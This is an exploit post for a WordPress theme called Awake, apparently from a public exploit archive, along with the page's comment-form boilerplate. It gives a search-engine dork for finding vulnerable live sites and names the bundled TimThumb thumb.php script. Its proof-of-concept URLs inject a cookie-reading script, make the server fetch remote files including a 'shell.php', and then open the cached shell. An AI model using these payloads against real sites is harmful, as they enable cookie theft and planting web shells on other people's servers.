WordPress Themes Awake - Cross-Site Scripting

2017.06.13

x0id (ID)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: WordPress Themes Awake - Cross-Site Scripting
# Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Search target with Google Dorking.
inurl:/wp-content/themes/awake
Index of /wp-content/themes/awake/

2) Exploit the websites.
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php
Vulnerability? TimThumb version : 1.14 / 1.19

3) Proof of concept (PoC)
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://www.example.com/big_file&h=1&w=1
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://www.example.com/shell.php

4) Result file access.
https://localhost/wp-content/themes/awake/lib/scripts/cache/your-file.php
https://localhost/wp-content/themes/awake/lib/scripts/cache/1234567890.jpg

Indonesian h4x0r.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Themes Awake - Cross-Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.